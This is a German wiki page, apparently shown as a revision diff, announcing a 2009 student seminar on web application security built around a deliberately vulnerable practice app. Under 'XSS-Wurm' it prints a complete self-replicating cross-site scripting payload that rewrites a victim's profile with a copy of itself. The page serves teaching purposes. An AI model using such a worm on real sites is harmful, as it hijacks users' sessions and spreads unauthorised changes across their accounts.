KunterBuntesSeminar-SS09/(Un)Sicherheit in Webanwendungen: Unterschied zwischen den Versionen
Keine Bearbeitungszusammenfassung |
(section "seminarvortrag" entfernt) |
||
Zeile 5: | Zeile 5: | ||
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt. | Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt. | ||
== Vortragende == | == Vortragende == |
Aktuelle Version vom 19. November 2009, 23:47 Uhr
Das ist der 5. Termin vom KunterBuntesSeminar-SS09
Abstract[Bearbeiten]
Ich möchte euch die Grundlagen der Sicherheit in Webanwendungen erläutern und dabei typische Schwachstellen aufzeigen. Es wird darum gehen, wie man diese verhindert, aber auch ausnutzen kann. Das Ausnutzen der Schwachstellen werden wir interaktiv an einer präparierten Webanwendung üben um so das Gelernte zu festigen. Der Vortrag wird ein wenig PHP-lastig sein, dieses ist zwei Umständen geschuldet: Erstens sind die meisten Webanwendungen in PHP geschrieben und zweitens macht PHP es den Programmierern sehr leicht sich selbst ins Knie zu schiessen.
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.
Vortragende[Bearbeiten]
Henning (8pridoeh): Fragen zum Thema beantworte ich gerne. Ihr findet mich hin und wieder im c.t. oder anderswo in der Gegend.
Folien/Material[Bearbeiten]
Folien: Datei:Sicherheit in webapplikationen.pdf
Präparierte Webanwendung: Datei:Stasivz.tar.gz
XSS-Wurm:
hacked<script>(function(){a=new XMLHttpRequest(); a.open('POST','index.php?page=editprofile',true); a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); a.send('change_profile=1&movie=hacked<script>('. concat(escape(arguments.callee.toString().concat(')();</scr'). concat('ipt>')))); })();</script>
(Zeilenumbrüche vorher entfernen)
Weiterführende Links[Bearbeiten]
Firefox-Addons:
Cheat Sheets: